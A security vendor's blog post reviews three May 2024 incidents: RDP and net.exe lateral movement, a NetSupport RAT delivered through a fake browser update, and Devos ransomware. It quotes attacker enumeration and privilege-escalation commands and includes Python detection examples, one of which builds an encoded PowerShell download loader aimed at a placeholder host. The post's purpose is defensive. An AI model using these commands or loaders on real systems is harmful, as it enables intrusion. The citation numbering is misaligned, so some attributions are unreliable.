Between May 01-08, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 117 total incidents. These incidents included 18 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 97 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:

In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.


RDP for Lateral Movement Incident with Professional & Commercial Services Partner on May 04, 2024

Topline Takeaways

  • Industry target: Professional & Commercial Services
  • Attacker information:
    • RDP
    • NetScan
    • Powershell_Custom.exe
    • CMD_Custom.exe
    • 7zG.exe
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use RDP to exploit other Professional & Commercial Services organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Least-privilege access controls
    • Multifactor authentication (MFA)
    • Proper firewall configurations
    • Incident response plans (IRPs)

Remote Desktop Protocol (RDP) Incident Timeline for May 04, 2024

  • Blackpoint’s MDR+R alerted Active SOC analysts to a Professional & Commercial Services partner’s user account enumerating domain trusts, targeting all trusts and domain controllers in the managed host environment.
  • During the initial investigation, analysts found the compromised user account performing netscans and pinging Google to check for network connectivity, then using RDP to access additional hosts and servers.
  • Active SOC analysts isolated all impacted hosts and the compromised user account, and contacted the Professional & Commercial Services partner to discuss the incident and provide additional remediation advice.
  • Post incident investigation determined that:
    • The compromised user account provided the threat actor’s initial access into the managed endpoint and environment. The user had received multiple illegitimate MFA prompts approximately 20 minutes before the MDR+R alert, at which point the account’s password was changed; and
    • The compromised user account had fetched three malicious files from another server – “Powershell_Custom.exe”, “CMD_Custom.exe”, and “7zG.exe” – that investigators subsequently removed.

More About Remote Desktop Protocol (RDP) Abuse and Net.exe


Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a protocol that allows users to use a desktop remotely, often used for two legitimate professional purposes:

  1. Remote Desktop Access: Users can access their physical desktop computer from another device.
  2. Remote Administration: Administrators can perform remote administrative work on a device by connecting to it.

However, threat actors can abuse RDP to move laterally through compromised networks. They initially target RDP on victim endpoints through a variety of methods (1), including:

  • Hijacking legitimate RDP sessions;
  • Using accessibility features, such as Sticky Keys;
  • Brute force attacks;
  • Malware specifically designed to target and take over RDP; and
  • Protocol tunneling.

Net.exe

Net.exe is the net command, which allows users to view and manage (2):

  • Network shares,
  • User accounts,
  • Group memberships,
  • Services, and
  • Print queues.

Blackpoint Active SOC analysts, the APG, and other researchers have seen threat actors using the Net.exe command to enumerate domains and user accounts as part of a “living off the land” (LotL) strategy, abusing allowlisted applications to mask malicious activity and evade AV and EDR solutions. Once domains and accounts are enumerated, threat actors can use them to move laterally to more strategic endpoints during a cyberattack.

APG Threat Analysis of Remote Desktop Protocol (RDP) Abuse and Net.exe for 2024


The APG predicts that threat actors will very likely continue to use the Net.exe command and remote desktop protocol (RDP) for lateral movement over the next 12 months.

We base this assessment on the APG’s previous research tracking 37 ransomware operators that abuse the “net” command to discover user accounts, domain accounts, and more for lateral movement and privilege escalation during reported incidents from the Blackpoint Active SOC managed environment. An additional 29 ransomware operations have been observed abusing RDP for lateral movement.

External researchers have observed similar behaviors in their own environments and incidents. In 2024, for example, Trend Micro researchers observed Black Basta ransomware operators using the “net” command during an attack. Specifically, they used:

  • net.exe group "Domain Admins" /domain
  • nltest.exe /domain_trusts /all_trusts
  • net.exe localgroup Administrators Adminis /add

to enumerate domain admin accounts, enumerate domain trusts, and add a new user to the local Administrators group, respectively. (3)
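The commands above are ordinary admin tooling, so detecting their abuse comes down to inspecting command lines in process-creation telemetry. The following is an added example, not Blackpoint’s or Trend Micro’s code: it classifies Sysmon-style events (constructed here, with assumed host and user names) into the discovery and escalation patterns described in this section, treating net1.exe like net.exe and keeping quoted group names intact.

```python
import ntpath
import re

# Constructed Sysmon-style ProcessCreate events (not from the page). The first three mirror
# the command lines reported by Trend Micro; the last is routine admin activity.
SAMPLE_EVENTS = [
    {"Host": "WS01", "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net.exe group "Domain Admins" /domain'},
    {"Host": "WS01", "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\nltest.exe",
     "CommandLine": "nltest.exe /domain_trusts /all_trusts"},
    {"Host": "WS01", "User": "CORP\\jdoe", "Image": r"C:\Windows\System32\net1.exe",
     "CommandLine": "net1 localgroup Administrators backupsvc /add"},
    {"Host": "WS02", "User": "CORP\\asmith", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use Z: \\fileserver\share /persistent:yes"},
]

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators", "schema admins"}


def tokenize(cmdline):
    # Keep quoted arguments such as "Domain Admins" as a single token, then drop the quotes.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(event):
    """Return (rule, severity) for a LotL discovery/escalation command line, else None."""
    exe = ntpath.basename(event["Image"]).lower()
    args = [a.lower() for a in tokenize(event["CommandLine"])[1:]]
    if exe == "nltest.exe" and any(a in ("/domain_trusts", "/all_trusts", "/dclist") for a in args):
        return ("domain_trust_enumeration", "medium")
    if exe in ("net.exe", "net1.exe") and args:
        verb, rest = args[0], args[1:]
        if verb == "group" and "/domain" in rest:
            # Listing a privileged domain group is rated higher than generic group discovery.
            sev = "high" if any(g in rest for g in PRIVILEGED_GROUPS) else "medium"
            return ("domain_group_enumeration", sev)
        if verb == "localgroup" and "/add" in rest:
            return ("local_group_member_added", "high")
        if verb == "user" and "/domain" in rest and not any(f in rest for f in ("/add", "/delete")):
            return ("domain_user_enumeration", "medium")
    return None


def scan(events):
    """Run classify() over a batch of events and return the findings with host/user context."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"host": ev["Host"], "user": ev["User"], "rule": hit[0], "severity": hit[1]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Three findings from the same user on one host within a short window is the kind of clustering that turned this incident into an alert; the share-mapping event produces no finding.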

Recommended Remote Desktop Protocol (RDP) and Net.exe Abuse Mitigations and Remediations


Blackpoint APG recommends the following actions to help mitigate the malicious use of these legitimate tools.

  • Least-privilege access controls, to help ensure that users only have access to the data and resources required to complete their job functions.
  • Multifactor authentication (MFA) enforced on all user accounts – but especially those with privileged access – to help decrease the chances of undetected credential compromise.
  • Establishing adequate firewall rules, including restricting access to port 3389 and blocking RDP traffic between network security zones.
  • Incident response plan (IRP) creation, testing, and implementation when necessary. IRPs should include emergency processes for data backup and restoration; notification processes – including internal and external partners, team members, and law enforcement; and ensuring business continuity.


NetSupport RAT Incident with Industrials Partner on May 06, 2024

Topline Takeaways

  • Industry target: Industrials
  • Attacker information:
    • Update_123.0.6312.111.js
    • ah.zip
    • NetSupport RAT
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use NetSupport RAT to exploit other Industrials organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Multifactor authentication (MFA)
    • Heuristics-based activity monitoring and remediation
    • Dedicated software center

NetSupport RAT Incident Timeline for May 06, 2024

  • Blackpoint MDR+R alerted our Active SOC team to suspicious PowerShell execution on an Industrials partner host.
  • Initial investigation found the PowerShell activity sourced from the file “Update_123.0.6312.111.js”, which attempted to fetch a payload file “ah.zip” from the web; the payload turned out to be the NetSupport RAT. Both the payload and the PowerShell script leveraged obfuscation techniques, including base64 encoding, in an effort to hide their activities from EDR and AV solutions.
  • Active SOC analysts isolated the infected host to prevent additional malicious activity, after which the team contacted the Industrials partner to inform them of the incident and provide additional context and remediation advice.
  • Post-incident analysis revealed that the initial infection resulted from the affected user attempting to download a Google Chrome update.
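Base64 obfuscation of the PowerShell stage, as in this incident, is only a thin layer: PowerShell’s -EncodedCommand argument is base64 over UTF-16LE text, so it can be decoded and inspected in the same pipeline that collects the command line. The following is an added example, not Blackpoint’s code or the incident’s actual script; the loader text, the hidden-window flag and the URL (a placeholder under example.invalid) are constructed to resemble a download-and-extract stage fetching an “ah.zip” payload.

```python
import base64
import re


def encode_for_powershell(script):
    """Encode text the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (not from the incident): a download-and-extract stage and a harmless command.
LOADER_SCRIPT = ("$u='http://updates.example.invalid/ah.zip';$o=\"$env:TEMP\\ah.zip\";"
                 "Invoke-WebRequest -Uri $u -OutFile $o;Expand-Archive $o $env:TEMP")
SUSPICIOUS_CMD = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(LOADER_SCRIPT)
BENIGN_CMD = "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date -Format o")

# -e, -ec, -enc and -EncodedCommand are all accepted abbreviations of the same parameter.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_CMDLETS = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer",
                              re.IGNORECASE)
ARCHIVE_URL = re.compile(r"https?://\S+?\.zip\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline):
    """Decode the command and collect indicators of a download-and-execute stage."""
    script = decode_encoded_command(cmdline)
    indicators = []
    if script is None:
        return {"script": None, "indicators": indicators, "verdict": "not_encoded"}
    if HIDDEN_WINDOW.search(cmdline):
        indicators.append("hidden_window")
    if DOWNLOAD_CMDLETS.search(script):
        indicators.append("download_cmdlet")
    for url in ARCHIVE_URL.findall(script):
        indicators.append("archive_url:" + url)
    verdict = "suspicious" if "download_cmdlet" in indicators else "benign"
    return {"script": script, "indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SUSPICIOUS_CMD))
    print(assess(BENIGN_CMD))
```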

More About the NetSupport RAT


The NetSupport RAT (Remote Access Trojan) is a repurposed version of the legitimate NetSupport Manager remote support application. The NetSupport RAT is a versatile tool that allows threat actors to act in multiple ways, including:

  • Monitoring user behaviors,
  • Keylogging,
  • Transferring or exfiltrating files,
  • Taking control of system resources, and / or
  • Moving laterally to other devices connected on the network.

NetSupport RAT is often downloaded via fake websites and fake browser updates; however, initial access vectors vary depending on the group using the malware. In 2023, for example, an unknown threat group conducted a campaign delivering the NetSupport RAT by tricking users into downloading fake Google Chrome updates – very similar to the attack vector for this incident. The infected website hosted a PHP script that appeared to be a legitimate Chrome update. In that campaign, “Update_browser_10.6336.js” was the payload downloaded from the fake browser update. (4)

Because NetSupport Manager is used legitimately as well as repurposed as a RAT, the NetSupport RAT is difficult for traditional AV or EDR solutions to spot; and because its use is not restricted to a single threat actor or group, attacker attribution is also more difficult.

APG Threat Analysis of NetSupport RAT for 2024


The APG predicts that threat actors will likely continue to use remote access trojans, such as the NetSupport RAT, specifically for persistence over the next 12 months.

We base this assessment on recent and varied threat actor use of the tool in multiple industries and situations:

  • In January 2024, eSentire reported a NetSupport RAT campaign spread via fake browser updates (5).
  • In March 2024, Perception Point researchers reported a new “Operation PhantomBlu” threat campaign, which featured a NetSupport RAT campaign delivered via social engineering messages with malicious attachments (6).

Recommended NetSupport RAT Mitigations and Remediations


Blackpoint APG recommends the following actions to help mitigate the deployment and use of NetSupport RATs and similar malware by threat actors.

  • Multifactor authentication (MFA) and VPN use where feasible to ensure only identified and authorized employees can access sensitive data and resources with an additional level of credential authentication.
  • Employ heuristics-based activity monitoring and remediation to detect unusual user behaviors and activities that could indicate malicious activity or compromised accounts within the managed environment that would otherwise be missed by more traditional security solutions, such as AV or EDR.
  • Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location, without forcing them to “go rogue” and accidentally download malware from a malvertising or SEO-poisoned instance.


Devos Ransomware Incident with Healthcare Partner on May 07, 2024

Topline Takeaways

  • Industry target: Healthcare
  • Attacker information:
    • VSSAdmin
    • svchost.exe
    • Fast.exe
    • dControl.ini
    • dControl.exe
    • taskmgr[on].reg
    • taskmgr[off].reg
    • devos-####[at]zohomail[.domain]
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is almost certain that threat actors will continue to use Devos Ransomware to exploit other Healthcare organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Create and maintain data backups
    • Least-privilege access controls
    • Regularly audit both environment and endpoints

Devos Ransomware and VSSAdmin Incident Timeline for May 07, 2024

  • Within a 3-minute window, a threat actor compromised an RDP connection on a Healthcare partner’s endpoint from an IP address in Great Britain, with the threat actor staging files from “C:\Users\$username\Music\devos-[####]@zohomail[.domain]\”.
    • Blackpoint’s Ransomware Response technology automatically halted the ransomware’s attempted deployment before a material breach occurred.
  • Simultaneously, Blackpoint MDR+R technology alerted Active SOC analysts to Vssadmin being deleted and the Blackpoint canary files being overwritten by an executable “svchost.exe” stored in the music folder.
  • Blackpoint’s MDR+R immediately suspended the malicious process while the Active SOC analyst team began investigating, which retroactively uncovered the initial compromise and attempted ransomware deployment.
  • Our Active SOC analysts also isolated the infected device to prevent further malicious activity, and contacted the Healthcare partner to inform them of the incident and advise on additional mitigations and remediation steps.
  • Additional post-incident analysis by the Blackpoint APG confirmed the activity to be related to the Devos ransomware operation.

More About Devos Ransomware


The Blackpoint APG and other security researchers have assessed the Devos ransomware package as a variant of the older Phobos ransomware family, active since 2019.

Similar to previous incidents described in this analysis, researchers have seen Devos ransomware operators historically using the Remote Desktop Protocol (RDP) for lateral movement during reported incidents (7), which is in line with the APG’s assessment of overall recent ransomware landscape threat activity trends.

APG Threat Analysis of Devos Ransomware for 2024


The APG predicts that threat actors will almost certainly continue to use Devos ransomware over the next 12 months.

We base this assessment on analysis of Blackpoint Active SOC incident reports from managed environments, as well as recent external reports of increased use of the ransomware package.

Specifically, in May 2024, Trend Micro researchers reported that Phobos ransomware was the second most detected ransomware operation in Q1 2024, following the LockBit operation (8).

At a strategic level, ransomware in general has repeatedly posed a critical threat to organizations worldwide over the previous decade, with attacks increasing year over year, per the APG’s own internal tracking and analysis.

Despite law enforcement and government attention and disruption, ransomware operators have little incentive to cease operations. Additionally, many groups that shut down operations or are disrupted by law enforcement operations return to the landscape with rebranding or under the affiliate program of another group, which was evidenced in the recent criminal cases of:

  • REvil (9),
  • Conti (10),
  • LockBit (11),
  • ALPHV / BlackCat (12), and others.

Therefore, it is practically certain that ransomware operators and affiliates will continue to target organizations across all verticals, continuing to abuse RDP, Vssadmin, and similar legitimate services and tools over the next 12 months.

Recommended Devos and Similar Ransomware Mitigations and Remediations


Blackpoint APG recommends the following actions to help mitigate the deployment of ransomware overall. (Note that these mitigations are not specific to any ransomware operation, as many criminal gangs demonstrate similar behaviors. By employing these techniques, you should greatly reduce your exposed attack surface to many ransomware attempts – not simply that of Devos.)

  • Employee security training remains a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  • Create and maintain data backups, including offline backups that are kept separate from the network and system. Should your system suffer a lockout from a ransomware attempt, your uncorrupted and easily reinstated data backups become a key part of your business continuity plan to resume regular operations.
  • Least-privilege access controls help ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desirable targets.
  • Regularly audit both environment and endpoints to identify weak points, apply necessary patching requirements, and close potential infection paths.

References and Resources

A quick note on incident details:

As these analyses concern recent incidents in actively monitored environments, certain details may occasionally be omitted and / or obfuscated to better secure our partners and protect any still-ongoing investigations.

However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.

Please feel free to reach out to the APG directly if you have any questions about a specific incident!

  1. ReliaQuest’s Blog: “Scattered Spider Attack Analysis” by James Xiang on 2023 November 21
  2. Blackpoint Cyber’s Blog: “How RDP Attacks Go Down” by Blackpoint Cyber on 2022 May 31
  3. SpyShelter’s Blog: “What’s net.exe (Net Command)? Is it safe or a virus?” by SpyShelter on 2024 February 15
  4. Trend Micro’s Blog: “Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities” by Ian Kenefick, Junestherry Dela Cruz, and Peter Girnus on 2024 February 27
  5. VMware’s Blog: “NetSupport RAT: The RAT King Returns” by Alan Ngo, Abe Schneider, and Fae Carlisle on 2023 November 20
  6. eSentire’s Blog: “SmartApeSG Delivering NetSupport RAT” by eSentire Threat Response Unit (TRU) on 2024 January 18
  7. Perception Point’s Blog: “Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT” by Ariel Davidpur and Peleg Cabra on N/A
  8. 360 Total Security’s Blog: “Analysis of Ransomware Outbreak in March 2020” by kate on 2020 April 28
  9. Trend Micro’s Blog: “PHOBOS EMERGES AS A FORMIDABLE THREAT IN Q1 2024, LOCKBIT STAYS IN THE TOP SPOT” by Trend Micro on 2024 May 07
  10. Secure MSP’s Blog: “REvil ransomware gang returns after two-month hiatus” by Eric Swotinsky on 2021 September 17
  11. Global Initiative’s Blog: “The rise and fall of the Conti ransomware group” by Jack Meegan-Vickers on 2023 June 27
  12. U.S. DoJ’s Press Release: “U.S. and U.K. Disrupt LockBit Ransomware Variant” by Office of Public Affairs on 2024 February 20
  13. U.S. DoJ’s Press Release: “Justice Department Disrupts Prolific ALPHV/Blackcat Ransomware Variant” by Office of Public Affairs on 2023 December 19